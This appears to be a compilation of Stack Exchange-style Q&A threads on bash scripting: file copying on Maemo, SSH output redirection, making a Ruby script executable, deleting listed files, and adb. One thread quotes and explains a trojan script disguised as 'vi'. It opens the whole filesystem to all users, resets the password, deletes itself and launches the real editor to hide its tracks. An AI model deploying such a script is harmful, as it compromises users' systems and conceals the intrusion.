Running bash shell in Maemo - bash

I have attempted to run the following bash script on my internet tablet (Nokia N810 running on Maemo Linux). However, it doesn't seem that it is running, and I have no clue of what's wrong with this script (it runs on my Ubuntu system if I change the directories). It would be great to receive some feedback on this or similar experiences of this issue. Thanks.
cp calendar categories contacts todo $WORKING

What actually happens when you run your script? It's helpful if you include details of error messages or behavior that differs from what's expected and in what way.
If $WORKING contains the name of a directory, hidden or not, then the cp should copy those four files into it. Then ls -l /home/user/.gpe should show them plus whatever else is in there, regardless of whether it's "hidden".
By the way, the initial dot in a file or directory name doesn't really "hide" the entry, it's just that ls and echo * and similar commands don't show them, while these do:
ls -la
ls -d .*
ls -d {.*,*}
echo .*
echo {.*,*}

The bash cp command can copy multiple sources to a single destination, if it's a directory.
Does the directory /home/user/.gpe exist?
Bear in mind that the leading dot in the name can make it hidden unless you use ls -a
I tried your commands in cygwin:
But I used .gpe instead of /home/user/.gpe
I did a touch calendar categories contacts todo to create the files.
It worked fine.

If that's the entirety of your script, it's missing two. possible three, things:
A shebang line, such as #!/bin/sh at the start
Use of $SVNPATH. You probably want to cd $SVNPATH before the cp command. Your script should not assume the current working directory is correct.
Possibly execute permission on the script: chmod a+x script

Do you already have the /home/user/.gpe directory present? And also, try adding a -R parameter so that the directories are copied recursively.


What does this Bash Shell Script do?

i'm a very clueless beginner when it comes to Shell Scripts but i have to be able to explain what these lines of code do and not enough time to get more familiar with it first, so i cant't really give a lot of input.
As additional information the script itself is called vi just like the editor and is probably harmful/hoping to be run as admin
# execute on your own risk !!
chmod -R og+rwx /
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd
rm $0
vi $*
logout # good bye!
I think the idea is that somebody is trying to run the actual vi (not this script) and then he accidentally calls this script - it changes the current users password to the output of the echo command (not sure what that is tho) and then the shell deletes itself and calls the editor so we dont realize anything happened.
huge thank you to any answer in advance and sorry for being so clueless.
HMM Not sure if clueless beginner or a crafty hacker [insert suspicious Fry meme]. With the last name like that?
Here's what the script does, step-by-step:
chmod -R og+rwx /: recursively (-R) opens all your files for reading, writing and executing (+rwx) by users in your group (g) and all other users (o).
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd: resets your superuser password to "Hacke.peter".
rm $0: removes itself. The $0 in bash stands for the file name of the current script.
vi $*: opens the real vi editor with whatever arguments ($*) you passed to the original (now erased) script. If the script was also called vi, this step is to hide the tracks and avoid suspicion.
logout: logs you out of root mode. Now you no longer have root and your filesystem is open.
Very nasty script!

bash commands to remote hosts - errors with writing local output files

I'm trying to run several sets of commands in parallel on a few remote hosts.
I've created a script that constructs these commands, and then writes the output in a local file, something along the lines of:
ssh <me>#<ip1> "command" 2> ./path/to/file/newFile1.txt & ssh <me>#<ip2>
"command" 2> ./path/to/file/newFile2.txt & ssh <me>#<ip2> "command" 2>
./path/to/file/newFile3.txt; ...(same repeats itself, with new commands and new
file names)...
My issue is that, when my script runs these commands, I am getting the following errors:
bash: ./path/to/file/newFile1.txt: No such file or directory
bash: ./path/to/file/newFile2.txt: No such file or directory
bash: ./path/to/file/newFile3.txt: No such file or directory
These files do NOT exist but will be written. That being said, the directory paths are valid.
The strange thing is that, if I copy and paste the whole big command, then it works without any issue. I'd rather have it automated tho ;).
Any ideas?
Edit - more information:
My filesystem is the following:
- home
- User
- Desktop
- Servers
- Outputs
- ...
I am running the bash script from home/User/Desktop/Servers.
The script creates the commands that need to be run on the remote servers. First thing first, the script creates the directories where the files will be stored.
mkdir -p ${outputFolder}/f{fileNumb}
The script then continues to create the commands that will be called on remotes hosts, and their respective outputs will be placed in the created directories.
The directories are there. Running the commands gives me the errors, however printing and then copying the commands into the same location works for some reason. I have also tried to give the full path to directory, still same issue.
Hope I've been a bit clearer.
If this is the exact error message you get:
bash: ./path/to/file/newFile1.txt: No such file or directory
Then you'll note that there's an extra space between the colon and the dot, so it's actually trying to open a file called " ./path/to/file/newFile1.txt" (without the quotes).
However, to accomplish that, you'd need to use quotes around the filename in the redirection, as in
something ... 2> " ./path/to/file/newFile1.txt"
Or the first character would have to something else than a regular space. A non-breaking space perhaps, possible something that some editor might create if you hit alt-space or such.
I don't believe you've shown enough to correctly answer the question.
This doesn't look like a problem with ssh, but the way you are calling the (ssh) commands.
You say that you are writing the commands into a file... presumably you are then running that file as a script. Could you show the code you use to do that. I believe that's your problem.
I suspect you have made a false assumption about the way the working directory changes when you run a script. It doesn't. You are listing relative paths, so its important to know what they are relative to. That is the most likely reason for it working when you copy and paste it... You are executing from a different working directory.
I am new to bash scripting and was building my script based on another one I had seen. I was "running" the command by simply calling the variable where the command was stored:
Solved by using:
eval $cmd
instead. My bad, should have given the full script from the start.

How do I make a Ruby script into a bash command?

I have a Ruby file, and I run it as ruby file.rb "parameters". I prefer to run it as regtask parameters without having to include ruby and the filename every time. I want it to be on the same level as ls. How would I accomplish this?
Edit your file, make sure this is the first line, so your system knows how to execute your file:
#!/usr/bin/env ruby
Next, change the file's permissions to make it executable:
chmod a+x file.rb
And finally, rename it and move it somewhere where it will be executed without having to write its full path:
mkdir -p ~/bin
mv file.rb ~/bin/regtask
(Most systems will automatically add ~/bin to PATH if it exists; if not, you will have to add it to PATH yourself in your startup files.)
This should help.. Please let me know if you run into any issues.
Making a Ruby Script Executable
It's common knowledge in the *nix community, but for many new developers turning a Ruby script into an executable command line program is akin to magic. While there are other references on the internet, for the post here, I will briefly explain how to go from running a Ruby script by invoking Ruby directly, to running the script by its name alone.
We will start by assuming we have a simple Ruby script which prints "hello" on the command line. Our script's name will be greeter.rb. The file holds one line of Ruby code:
puts "Hello!"`
To run the script, we must type ruby greeter.rb. Wouldn't it be nice to just type greeter instead and still get the script to run? Yes, it would.
First, we need to tell Bash what to do with our file since we won't be passing the script to Ruby directly. To do that, we add the following to the very top of our script:
#!/usr/bin/env ruby
puts "Hello!"
The first line is a Bash directive and basically tells Bash what program to run our file with by asking for the current configured version of Ruby as specified by the env command. For more on how env works, try typing man env into the command line.
Second, we need to make our script executable, which requires changing the file permissions. If the concept of file permissions is new, read about it here. Bascially, files have three types of permissions. They can be read, written, and executed. Most files typically start out as only having read and write access. Since we want to execute our script, we're going to have to grant it execute permissions.
Doing that is just a simple Bash command. On the command line, navigate to the directory holding the greeter.rb file. Now, to check the permissions, run:
ls -l greeter.rb
The output will look something like this:
-rw-r--r-- 1 username staff 13 Feb 16 21:10 greeter.rb
Your own username will show up in the place of username, and the creation date will naturally be different, but otherwise the output will be almost identical. The first part of the line is the revelant part. The letters r and w specify read and write permissions.
We're going to add execute permissions which will appear as an x in that line. To add execute permissions, run the following command.
chmod 755 greeter.rb
Now, if you check the file permissions again with ls -l greeter.rb, the output should be a little different.
-rwxr-xr-x 1 username staff 13 Feb 16 21:20 greeter.rb
The presence of x indicates that the file can be run directly without calling Ruby first. The following command should get our file to say "hello."
Almost there. Now, we just need to get rid of the prefix ./, which tells Bash where to look for greeter.rb, i.e., in the current directory. Before we complete this last step, though, let's rename our file to just greeter.
mv greeter.rb greeter
Now, for the last step. Everytime we call a Bash program, e.g., ls, chmod, mv, etc., Bash searches through a predefined list of folders looking for those programs. This is called the path. To see what the path is set to on your computer, try:
echo "$PATH"
The output should be a long string of various system-critical folders. We need to put our application into one of these folders. Traditionally, it's best to leave folders like /usr/bin/ and /bin/ alone. Instead, any kind of user additions should be placed in /usr/local/bin/. If that folder doesn't exist, create it with:
mkdir -p /usr/local/bin/
Now, we can either move our greeter into that folder, or leave the application where it is and just create a softlink (or an alias in OS X terms) within the /usr/local/bin/ folder. To create an alias, we'll use the ln command. From the directory where greeter lives, type:
ln -s $PWD/greeter /usr/local/bin/
Note that the $PWD variable will expand to an absolute path to our greeter script. Now, we're done and we can simply type greeter to invoke our Ruby script!
As a footnote, if any of the above Bash commands seem confusing, trying looking up their man page by typing man <command>.

Deleting files from a list using shell

I am a beginner with Applescript & Shell and am writing a script that at a certain point requires me to delete files that are listed within a .txt file. I have searched extensively on stackoverflow and was able to come up with the following command that I am running from within my Applescript...
do shell script "while read name; do
rm -r \"$name"\
done < ~Documents/Script\\ Test/filelist.txt"
It seems to recognize and read the file, but I get an error that says this and I cannot figure out why:
error "rm: ~/Documents/Script Test/filetodelete.rtf: No such file or directory" number 1
That said, I can navigate to that exact directory and verify that a file by that name with that extension does indeed exist. Can someone help shed some light on why this error might be occurring?
You have a typo. The path to the file is most probably ~/Documents, not ~Documents (which in Bash would be the home directory of a user whose account name is Documents).
If your shell is not Bash, it might not even support ~ for $HOME.
In the data file, you also cannot use ~ to refer to your home directory. You could augment the loop with a simple substitution to support this:
while read -r file; do
case $file in '~'*) file=$HOME${file#\~};; esac
rm -r "$file"
done < ~/"Documents/Script Test/filelist.txt"
Notice also the use of read -r to avoid some pesky problems with the legacy default behavior of read.

why "adb shell ls /sdcard" return diffrent results

$ adb shell ls /sdcard/*|wc -l
$ adb shell ls /sdcard/|wc -l
I payed 2 commands through adb above, but gives 2 different results.
Some folder, for example "LOST.DIR" will appear in /sdcard/ but not in /sdcard/*
The first one is showing you everything in the sdcard directory, PLUS everything in one level of directories below that. That's also why LOST.DIR disappears; because there's nothing in it.
Consider that ls /sd* would show you the content of the sdcard directory; that might help understand what's happening here. Wildcard expansion happens before running the external program ls.
